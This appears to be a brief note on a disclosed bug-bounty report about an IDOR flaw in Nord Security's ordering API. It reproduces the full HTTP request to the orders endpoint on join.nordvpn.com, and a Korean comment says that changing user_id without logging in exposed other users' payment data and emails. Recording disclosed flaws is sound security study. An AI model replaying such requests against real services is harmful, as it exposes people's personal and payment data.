hackerone-nord-security-2020-02-h-751577

IDOR allow access to payments data of any user

POST /api/v1/orders HTTP/1.1
Host: join.nordvpn.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 179
DNT: 1
Connection: close

{"payment":{"provider_method_account":"6xdxdd","parameters":{}},"action":"order","plan_id":653,"user_id":20027039,"tax_country_code":"TW","payment_retry":0,"is_installment":false}

로그인하지 않고 위와 같은 페이로드를 보내면 임의의 유저의 결제 정보에 접근할 수 있었다. user_id만 변경하면 되었다. 여기에는 고객의 이메일과 같은 개인 정보도 포함되었다.

tags: bughunting, wstg-athz-04, idor, web hacking, severity high